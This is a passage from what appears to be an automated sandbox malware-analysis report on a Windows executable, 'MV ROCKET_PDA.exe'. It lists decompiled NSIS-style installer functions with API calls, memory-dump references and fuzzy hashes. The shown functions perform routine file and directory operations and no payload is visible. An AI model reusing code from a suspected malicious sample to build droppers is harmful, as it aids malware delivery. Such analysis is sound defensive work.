					} while (_t23 != _t26);
				}
				if( *((intOrPtr*)(_t33 - 0x24)) == _t26) {
					_push(0xfffffff5);
					E00401423();
				} else {
					E00401423(0xffffffe6);
					E00405BC7("C:\\Users\\hardz\\AppData\\Local\\Temp", _t28);
					_t19 = SetCurrentDirectoryA(_t28); // executed
					if(_t19 == 0) {
						 *((intOrPtr*)(_t33 - 4)) =  *((intOrPtr*)(_t33 - 4)) + 1;
					}
				}
				 *0x42eca8 =  *0x42eca8 +  *((intOrPtr*)(_t33 - 4));
				return 0;
			}













                                                                                            0x004015b3
                                                                                            0x004015ba
                                                                                            0x004015bd
                                                                                            0x004015c2
                                                                                            0x004015c6
                                                                                            0x004015c8
                                                                                            0x004015d0
                                                                                            0x004015d2
                                                                                            0x004015d4
                                                                                            0x004015d8
                                                                                            0x004015db
                                                                                            0x004015f3
                                                                                            0x004015f4
                                                                                            0x004015dd
                                                                                            0x004015dd
                                                                                            0x004015e0
                                                                                            0x00000000
                                                                                            0x004015eb
                                                                                            0x004015ec
                                                                                            0x004015ec
                                                                                            0x004015e0
                                                                                            0x004015fb
                                                                                            0x00401602
                                                                                            0x0040160f
                                                                                            0x0040160f
                                                                                            0x00401604
                                                                                            0x00401605
                                                                                            0x0040160d
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x0040160d
                                                                                            0x00401602
                                                                                            0x00401612
                                                                                            0x00401615
                                                                                            0x00401617
                                                                                            0x00401618
                                                                                            0x004015c8
                                                                                            0x0040161f
                                                                                            0x0040164a
                                                                                            0x00402197
                                                                                            0x00401621
                                                                                            0x00401623
                                                                                            0x0040162e
                                                                                            0x00401634
                                                                                            0x0040163c
                                                                                            0x00401642
                                                                                            0x00401642
                                                                                            0x0040163c
                                                                                            0x004028c1
                                                                                            0x004028cd

                                                                                            APIs
                                                                                              • Part of subcall function 0040574E: CharNextA.USER32(00405500,?,0042B4A8,00000000,004057B2,0042B4A8,0042B4A8,?,?,?,00405500,?,C:\Users\user\AppData\Local\Temp\,?), ref: 0040575C
                                                                                              • Part of subcall function 0040574E: CharNextA.USER32(00000000), ref: 00405761
                                                                                              • Part of subcall function 0040574E: CharNextA.USER32(00000000), ref: 00405770
                                                                                            • GetFileAttributesA.KERNELBASE(00000000,00000000,00000000,0000005C,00000000,000000F0), ref: 00401605
                                                                                              • Part of subcall function 00405375: CreateDirectoryA.KERNELBASE(?,?,00000000), ref: 004053B8
                                                                                            • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Local\Temp,00000000,00000000,000000F0), ref: 00401634
                                                                                            Strings
                                                                                            • C:\Users\user\AppData\Local\Temp, xrefs: 00401629
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.277054308.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.277036376.0000000000400000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277080552.0000000000407000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277090932.0000000000409000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277160620.0000000000420000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277173462.000000000042C000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277191166.0000000000434000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277207000.0000000000437000.00000002.00020000.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                                            • String ID: C:\Users\user\AppData\Local\Temp
                                                                                            • API String ID: 1892508949-501415292
                                                                                            • Opcode ID: 61034fe80c9a9cb978dfe94cf849e2fb3a16e6b52be6386198d2ddf70ce6f83f
                                                                                            • Instruction ID: f91ea4ffc010c5324243c64a5f93d27bb3485e0f7fec8187872c5a269388ad6c
                                                                                            • Opcode Fuzzy Hash: 61034fe80c9a9cb978dfe94cf849e2fb3a16e6b52be6386198d2ddf70ce6f83f
                                                                                            • Instruction Fuzzy Hash: F011EB35504141ABDF317FA55D419BF67B4E992324728063FF592722D2C63C4942AA2F
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 72E41000, Relevance: 3.8, APIs: 3, Instructions: 54COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 62%
                                                                                            			E72E41000(intOrPtr _a8) {
				intOrPtr _t3;
				void* _t4;
				void* _t5;
				void* _t7;
				intOrPtr* _t14;
				intOrPtr* _t19;

				_t3 = _a8;
				if(_t3 != 0) {
					L3:
					 *0x72e43004 =  *_adjust_fdiv;
					if(_t3 != 1) {
						if(_t3 != 0) {
							L15:
							_t4 = 1;
							return _t4;
						}
						_t5 =  *0x72e4300c;
						if(_t5 == 0) {
							goto L15;
						}
						_t19 =  *0x72e43008 - 4;
						while(_t19 >= _t5) {
							_t14 =  *_t19;
							if(_t14 != 0) {
								 *_t14();
								_t5 =  *0x72e4300c;
							}
							_t19 = _t19 - 4;
						}
						free(_t5);
						 *0x72e4300c =  *0x72e4300c & 0x00000000;
						goto L15;
					}
					_t7 = malloc(0x80); // executed
					 *0x72e4300c = _t7;
					if(_t7 != 0) {
						 *_t7 =  *_t7 & 0x00000000;
						_push(0x72e45004);
						_push(0x72e45000);
						 *0x72e43008 =  *0x72e4300c;
						L72E42488();
						 *0x72e43000 =  *0x72e43000 + 1;
						goto L15;
					}
					L5:
					return 0;
				}
				if( *0x72e43000 <= _t3) {
					goto L5;
				}
				 *0x72e43000 =  *0x72e43000 - 1;
				goto L3;
			}









                                                                                            0x72e41000
                                                                                            0x72e41006
                                                                                            0x72e41016
                                                                                            0x72e41021
                                                                                            0x72e41027
                                                                                            0x72e4106a
                                                                                            0x72e410a5
                                                                                            0x72e410a7
                                                                                            0x00000000
                                                                                            0x72e410a7
                                                                                            0x72e4106c
                                                                                            0x72e41073
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x72e4107c
                                                                                            0x72e4107f
                                                                                            0x72e41083
                                                                                            0x72e41087
                                                                                            0x72e41089
                                                                                            0x72e4108b
                                                                                            0x72e4108b
                                                                                            0x72e41090
                                                                                            0x72e41090
                                                                                            0x72e41096
                                                                                            0x72e4109c
                                                                                            0x00000000
                                                                                            0x72e410a4
                                                                                            0x72e4102e
                                                                                            0x72e41037
                                                                                            0x72e4103c
                                                                                            0x72e41042
                                                                                            0x72e4104a
                                                                                            0x72e4104f
                                                                                            0x72e41054
                                                                                            0x72e41059
                                                                                            0x72e4105e
                                                                                            0x00000000
                                                                                            0x72e41065
                                                                                            0x72e4103e
                                                                                            0x00000000
                                                                                            0x72e4103e
                                                                                            0x72e4100e
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x72e41010
                                                                                            0x00000000

                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.279483824.0000000072E41000.00000020.00020000.sdmp, Offset: 72E40000, based on PE: true
                                                                                            • Associated: 00000000.00000002.279475009.0000000072E40000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.279497203.0000000072E44000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.279513465.0000000072E45000.00000040.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.279519577.0000000072E47000.00000002.00020000.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID: _inittermfreemalloc
                                                                                            • String ID:
                                                                                            • API String ID: 1678931842-0
                                                                                            • Opcode ID: e71355c48b1157ce8be45d0a510265b1a92da2da94a6c046dcccb81f1e5c69cc
                                                                                            • Instruction ID: 36b13bfd1bc04779f14ba797d0c3abc3d62aa678612833e1e58597289d6a3be2
                                                                                            • Opcode Fuzzy Hash: e71355c48b1157ce8be45d0a510265b1a92da2da94a6c046dcccb81f1e5c69cc
                                                                                            • Instruction Fuzzy Hash: 7F111F3BA952419BEB158E2AF554B193BFAB7103D9BB0A91DF4029E140DF31F482CB10
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00401389, Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 69%
                                                                                            			E00401389(signed int _a4) {
				intOrPtr* _t6;
				void* _t8;
				void* _t10;
				signed int _t11;
				void* _t12;
				intOrPtr _t15;
				signed int _t16;
				signed int _t17;
				void* _t18;

				_t17 = _a4;
				while(_t17 >= 0) {
					_t15 =  *0x42ec50; // 0x5141ac
					_t6 = _t17 * 0x1c + _t15;
					if( *_t6 == 1) {
						break;
					}
					_push(_t6); // executed
					_t8 = E00401434(); // executed
					if(_t8 == 0x7fffffff) {
						return 0x7fffffff;
					}
					_t10 = E0040136D(_t8);
					if(_t10 != 0) {
						_t11 = _t10 - 1;
						_t16 = _t17;
						_t17 = _t11;
						_t12 = _t11 - _t16;
					} else {
						_t12 = _t10 + 1;
						_t17 = _t17 + 1;
					}
					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
						 *0x42e40c =  *0x42e40c + _t12;
						SendMessageA( *(_t18 + 0x18), 0x402, MulDiv( *0x42e40c, 0x7530,  *0x42e3f4), 0);
					}
				}
				return 0;
			}












                                                                                            0x0040138a
                                                                                            0x004013fa
                                                                                            0x00401392
                                                                                            0x0040139b
                                                                                            0x004013a0
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x004013a2
                                                                                            0x004013a3
                                                                                            0x004013ad
                                                                                            0x00000000
                                                                                            0x00401404
                                                                                            0x004013b0
                                                                                            0x004013b7
                                                                                            0x004013bd
                                                                                            0x004013be
                                                                                            0x004013c0
                                                                                            0x004013c2
                                                                                            0x004013b9
                                                                                            0x004013b9
                                                                                            0x004013ba
                                                                                            0x004013ba
                                                                                            0x004013c9
                                                                                            0x004013cb
                                                                                            0x004013f4
                                                                                            0x004013f4
                                                                                            0x004013c9
                                                                                            0x00000000

                                                                                            APIs
                                                                                            • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                            • SendMessageA.USER32(00000020,00000402,00000000), ref: 004013F4
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.277054308.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.277036376.0000000000400000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277080552.0000000000407000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277090932.0000000000409000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277160620.0000000000420000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277173462.000000000042C000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277191166.0000000000434000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277207000.0000000000437000.00000002.00020000.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID: MessageSend
                                                                                            • String ID:
                                                                                            • API String ID: 3850602802-0
                                                                                            • Opcode ID: 1418929eafbb73b8fb58d843c81c3155069c7e16b288247307ca07652a38143c
                                                                                            • Instruction ID: 74927b77398f0d82d02f0f32bcc48ccf03ca760f88dcf9e2e40121dab22ba05a
                                                                                            • Opcode Fuzzy Hash: 1418929eafbb73b8fb58d843c81c3155069c7e16b288247307ca07652a38143c
                                                                                            • Instruction Fuzzy Hash: 4901F431B242209BE7195B399C09B6A3698E710328F10863BF851F72F1D678DC039B4D
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00405F57, Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 100%
                                                                                            			E00405F57(signed int _a4) {
				struct HINSTANCE__* _t5;
				signed int _t10;

				_t10 = _a4 << 3;
				_t8 =  *(_t10 + 0x409208);
				_t5 = GetModuleHandleA( *(_t10 + 0x409208));
				if(_t5 != 0) {
					L2:
					return GetProcAddress(_t5,  *(_t10 + 0x40920c));
				}
				_t5 = E00405EE9(_t8); // executed
				if(_t5 == 0) {
					return 0;
				}
				goto L2;
			}





                                                                                            0x00405f5f
                                                                                            0x00405f62
                                                                                            0x00405f69
                                                                                            0x00405f71
                                                                                            0x00405f7d
                                                                                            0x00000000
                                                                                            0x00405f84
                                                                                            0x00405f74
                                                                                            0x00405f7b
                                                                                            0x00000000
                                                                                            0x00405f8c
                                                                                            0x00000000

                                                                                            APIs
                                                                                            • GetModuleHandleA.KERNEL32(?,?,?,00403194,0000000D), ref: 00405F69
                                                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 00405F84
                                                                                              • Part of subcall function 00405EE9: GetSystemDirectoryA.KERNEL32 ref: 00405F00
                                                                                              • Part of subcall function 00405EE9: wsprintfA.USER32 ref: 00405F39
                                                                                              • Part of subcall function 00405EE9: LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 00405F4D
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.277054308.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.277036376.0000000000400000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277080552.0000000000407000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277090932.0000000000409000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277160620.0000000000420000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277173462.000000000042C000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277191166.0000000000434000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277207000.0000000000437000.00000002.00020000.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                                            • String ID:
                                                                                            • API String ID: 2547128583-0
                                                                                            • Opcode ID: c95d3685517970e0c019aac56d97440eb4eeb9d6cd7db5aa949554c45ee13345
                                                                                            • Instruction ID: bbbe084413d2e6f7ef046b623ea8b92179420db3b6db08e2e7fdeef9d7d4980c
                                                                                            • Opcode Fuzzy Hash: c95d3685517970e0c019aac56d97440eb4eeb9d6cd7db5aa949554c45ee13345
                                                                                            • Instruction Fuzzy Hash: 5DE08C32B08A12BAD6109B719D0497B72ACDEC8640300097EF955F6282D738AC11AAA9
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0040589E, Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 68%
                                                                                            			E0040589E(CHAR* _a4, long _a8, long _a12) {
				signed int _t5;
				void* _t6;

				_t5 = GetFileAttributesA(_a4); // executed
				asm("sbb ecx, ecx");
				_t6 = CreateFileA(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
				return _t6;
			}





                                                                                            0x004058a2
                                                                                            0x004058af
                                                                                            0x004058c4
                                                                                            0x004058ca

                                                                                            APIs
                                                                                            • GetFileAttributesA.KERNELBASE(00000003,00402C95,C:\Users\user\Desktop\MV ROCKET_PDA.exe,80000000,00000003), ref: 004058A2
                                                                                            • CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 004058C4
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.277054308.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.277036376.0000000000400000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277080552.0000000000407000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277090932.0000000000409000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277160620.0000000000420000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277173462.000000000042C000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277191166.0000000000434000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277207000.0000000000437000.00000002.00020000.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID: File$AttributesCreate
                                                                                            • String ID:
                                                                                            • API String ID: 415043291-0
                                                                                            • Opcode ID: 5340b84021e5d080a0f841e0942d03c921a309eaf12029fe197c00c0f40f89c7
                                                                                            • Instruction ID: e615d4ce70e2a600ad3370b8a7bf294de68ab1b424622093f8f4c5f34a5113e1
                                                                                            • Opcode Fuzzy Hash: 5340b84021e5d080a0f841e0942d03c921a309eaf12029fe197c00c0f40f89c7
                                                                                            • Instruction Fuzzy Hash: D5D09E31658301AFEF098F20DD1AF2EBBA2EB84B01F10962CB646940E0D6715C59DB16
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0040587F, Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 100%
                                                                                            			E0040587F(CHAR* _a4) {
				signed char _t3;

				_t3 = GetFileAttributesA(_a4); // executed
				if(_t3 != 0xffffffff) {
					return SetFileAttributesA(_a4, _t3 & 0x000000fe);
				}
				return _t3;
			}




                                                                                            0x00405883
                                                                                            0x0040588c
                                                                                            0x00000000
                                                                                            0x00405895
                                                                                            0x0040589b

                                                                                            APIs
                                                                                            • GetFileAttributesA.KERNELBASE(?,0040568A,?,?,?), ref: 00405883
                                                                                            • SetFileAttributesA.KERNEL32(?,00000000), ref: 00405895
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.277054308.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.277036376.0000000000400000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277080552.0000000000407000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277090932.0000000000409000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277160620.0000000000420000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277173462.000000000042C000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277191166.0000000000434000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277207000.0000000000437000.00000002.00020000.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID: AttributesFile
                                                                                            • String ID:
                                                                                            • API String ID: 3188754299-0
                                                                                            • Opcode ID: 526d85b860984864a1b6eb1eb54cd64df673d9b311570f6054ba349a806b51eb
                                                                                            • Instruction ID: cb5a672fe6ba1e8618a417a0682e77d28f0f111bf9a29bd8adb2d3f05be15d2c
                                                                                            • Opcode Fuzzy Hash: 526d85b860984864a1b6eb1eb54cd64df673d9b311570f6054ba349a806b51eb
                                                                                            • Instruction Fuzzy Hash: FDC04C71C08501ABD6016B34EF0DC5F7B66EB50322B14CB35F469A01F0C7315C66DA2A
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 004053F2, Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 100%
                                                                                            			E004053F2(CHAR* _a4) {
				int _t2;

				_t2 = CreateDirectoryA(_a4, 0); // executed
				if(_t2 == 0) {
					return GetLastError();
				}
				return 0;
			}




                                                                                            0x004053f8
                                                                                            0x00405400
                                                                                            0x00000000
                                                                                            0x00405406
                                                                                            0x00000000

                                                                                            APIs
                                                                                            • CreateDirectoryA.KERNELBASE(?,00000000,0040311D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,004032B8), ref: 004053F8
                                                                                            • GetLastError.KERNEL32 ref: 00405406
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.277054308.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.277036376.0000000000400000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277080552.0000000000407000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277090932.0000000000409000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277160620.0000000000420000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277173462.000000000042C000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277191166.0000000000434000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277207000.0000000000437000.00000002.00020000.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID: CreateDirectoryErrorLast
                                                                                            • String ID:
                                                                                            • API String ID: 1375471231-0
                                                                                            • Opcode ID: e7d0addc6a0e2cebebc6ed5ef3cfbde17ba04572b5523194c914a84283870961
                                                                                            • Instruction ID: 813393d6953da14087893f37eb662e151031eda4d181b9a341b076b840c4c01a
                                                                                            • Opcode Fuzzy Hash: e7d0addc6a0e2cebebc6ed5ef3cfbde17ba04572b5523194c914a84283870961
                                                                                            • Instruction Fuzzy Hash: 27C04C30619502DAD7105B31DD08B5B7E50AB50742F219535A506E11E1D6349492D93E
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 004030B0, Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 100%
                                                                                            			E004030B0(void* _a4, long _a8) {
				int _t6;
				long _t10;

				_t10 = _a8;
				_t6 = ReadFile( *0x409014, _a4, _t10,  &_a8, 0); // executed
				if(_t6 == 0 || _a8 != _t10) {
					return 0;
				} else {
					return 1;
				}
			}





                                                                                            0x004030b4
                                                                                            0x004030c7
                                                                                            0x004030cf
                                                                                            0x00000000
                                                                                            0x004030d6
                                                                                            0x00000000
                                                                                            0x004030d8

                                                                                            APIs
                                                                                            • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,00402EDD,000000FF,00000004,00000000,00000000,00000000), ref: 004030C7
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.277054308.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.277036376.0000000000400000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277080552.0000000000407000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277090932.0000000000409000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277160620.0000000000420000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277173462.000000000042C000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277191166.0000000000434000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277207000.0000000000437000.00000002.00020000.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID: FileRead
                                                                                            • String ID:
                                                                                            • API String ID: 2738559852-0
                                                                                            • Opcode ID: 27fbe12f246225e3c312bde4903856853e362ca19ec2099a42773af8ab92d4e2
                                                                                            • Instruction ID: 90557e19d7482b95f4dd5f96256efcc3496d5940ec1e4df6b8622c0cc682be59
                                                                                            • Opcode Fuzzy Hash: 27fbe12f246225e3c312bde4903856853e362ca19ec2099a42773af8ab92d4e2
                                                                                            • Instruction Fuzzy Hash: A1E08C32201118BBCF205E519D00AA73B9CEB043A2F008032BA18E51A0D630EA11ABA9
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 004030E2, Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 100%
                                                                                            			E004030E2(long _a4) {
				long _t2;

				_t2 = SetFilePointer( *0x409014, _a4, 0, 0); // executed
				return _t2;
			}




                                                                                            0x004030f0
                                                                                            0x004030f6

                                                                                            APIs
                                                                                            • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402E1C,000087E4), ref: 004030F0
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.277054308.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.277036376.0000000000400000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277080552.0000000000407000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277090932.0000000000409000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277160620.0000000000420000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277173462.000000000042C000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277191166.0000000000434000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277207000.0000000000437000.00000002.00020000.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID: FilePointer
                                                                                            • String ID:
                                                                                            • API String ID: 973152223-0
                                                                                            • Opcode ID: b482a8c56bd79b67497ba547cc3d1d0f84b07fc9ac7ac5f50d4e9ed509354c89
                                                                                            • Instruction ID: aafe5e0ddee8b519ffd98e4e857b28c3b9165386d483fecacc2863ad1570d206
                                                                                            • Opcode Fuzzy Hash: b482a8c56bd79b67497ba547cc3d1d0f84b07fc9ac7ac5f50d4e9ed509354c89
                                                                                            • Instruction Fuzzy Hash: D6B01231544200BFDB214F00DF06F057B21B79C701F208030B340380F082712430EB1E
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Non-executed Functions

                                                                                            Function 00404802, Relevance: 65.2, APIs: 33, Strings: 4, Instructions: 478windowmemoryCOMMONCrypto
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 98%
                                                                                            			E00404802(struct HWND__* _a4, int _a8, unsigned int _a12, int _a16) {
				struct HWND__* _v8;
				struct HWND__* _v12;
				signed int _v16;
				intOrPtr _v20;
				void* _v24;
				long _v28;
				int _v32;
				signed int _v40;
				int _v44;
				signed int* _v56;
				intOrPtr _v60;
				signed int _v64;
				long _v68;
				void* _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				void* _v84;
				void* __ebx;
				void* __edi;
				void* __esi;
				struct HWND__* _t182;
				intOrPtr _t183;
				int _t189;
				int _t196;
				intOrPtr _t198;
				long _t202;
				signed int _t206;
				signed int _t217;
				void* _t220;
				void* _t221;
				int _t227;
				intOrPtr _t231;
				signed int _t232;
				signed int _t233;
				signed int _t240;
				signed int _t242;
				signed int _t245;
				signed int _t247;
				struct HBITMAP__* _t250;
				void* _t252;
				char* _t268;
				signed char _t269;
				long _t274;
				int _t280;
				signed int* _t281;
				int _t282;
				long _t283;
				signed int* _t284;
				int _t285;
				long _t286;
				signed int _t287;
				long _t288;
				signed int _t291;
				int _t294;
				signed int _t298;
				signed int _t300;
				signed int _t302;
				intOrPtr _t309;
				int* _t310;
				void* _t311;
				int _t315;
				int _t316;
				int _t317;
				signed int _t318;
				void* _t320;
				void* _t328;
				void* _t331;

				_v12 = GetDlgItem(_a4, 0x3f9);
				_t182 = GetDlgItem(_a4, 0x408);
				_t280 =  *0x42ec48; // 0x51397c
				_t320 = SendMessageA;
				_v8 = _t182;
				_t183 =  *0x42ec30; // 0x5137d0
				_t315 = 0;
				_v32 = _t280;
				_v20 = _t183 + 0x94;
				if(_a8 != 0x110) {
					L23:
					__eflags = _a8 - 0x405;
					if(_a8 != 0x405) {
						_t289 = _a16;
					} else {
						_a12 = _t315;
						_t289 = 1;
						_a8 = 0x40f;
						_a16 = 1;
					}
					__eflags = _a8 - 0x4e;
					if(_a8 == 0x4e) {
						L28:
						__eflags = _a8 - 0x413;
						_v16 = _t289;
						if(_a8 == 0x413) {
							L30:
							__eflags =  *0x42ec39 & 0x00000002;
							if(( *0x42ec39 & 0x00000002) != 0) {
								L41:
								__eflags = _v16 - _t315;
								if(_v16 != _t315) {
									_t232 = _v16;
									__eflags =  *((intOrPtr*)(_t232 + 8)) - 0xfffffe6e;
									if( *((intOrPtr*)(_t232 + 8)) == 0xfffffe6e) {
										SendMessageA(_v8, 0x419, _t315,  *(_t232 + 0x5c));
									}
									_t233 = _v16;
									__eflags =  *((intOrPtr*)(_t233 + 8)) - 0xfffffe6a;
									if( *((intOrPtr*)(_t233 + 8)) == 0xfffffe6a) {
										__eflags =  *((intOrPtr*)(_t233 + 0xc)) - 2;
										if( *((intOrPtr*)(_t233 + 0xc)) != 2) {
											_t284 =  *(_t233 + 0x5c) * 0x418 + _t280 + 8;
											 *_t284 =  *_t284 & 0xffffffdf;
											__eflags =  *_t284;
										} else {
											 *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) =  *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) | 0x00000020;
										}
									}
								}
								goto L48;
							}
							__eflags = _a8 - 0x413;
							if(_a8 == 0x413) {
								L33:
								__eflags = _a8 - 0x413;
								_t289 = 0 | _a8 != 0x00000413;
								_t240 = E00404782(_v8, _a8 != 0x413);
								__eflags = _t240 - _t315;
								if(_t240 >= _t315) {
									_t93 = _t280 + 8; // 0x8
									_t310 = _t240 * 0x418 + _t93;
									_t289 =  *_t310;
									__eflags = _t289 & 0x00000010;
									if((_t289 & 0x00000010) == 0) {
										__eflags = _t289 & 0x00000040;
										if((_t289 & 0x00000040) == 0) {
											_t298 = _t289 ^ 0x00000001;
											__eflags = _t298;
										} else {
											_t300 = _t289 ^ 0x00000080;
											__eflags = _t300;
											if(_t300 >= 0) {
												_t298 = _t300 & 0xfffffffe;
											} else {
												_t298 = _t300 | 0x00000001;
											}
										}
										 *_t310 = _t298;
										E0040117D(_t240);
										_t242 =  *0x42ec38; // 0x80
										_t289 = 1;
										_a8 = 0x40f;
										_t245 =  !_t242 >> 0x00000008 & 1;
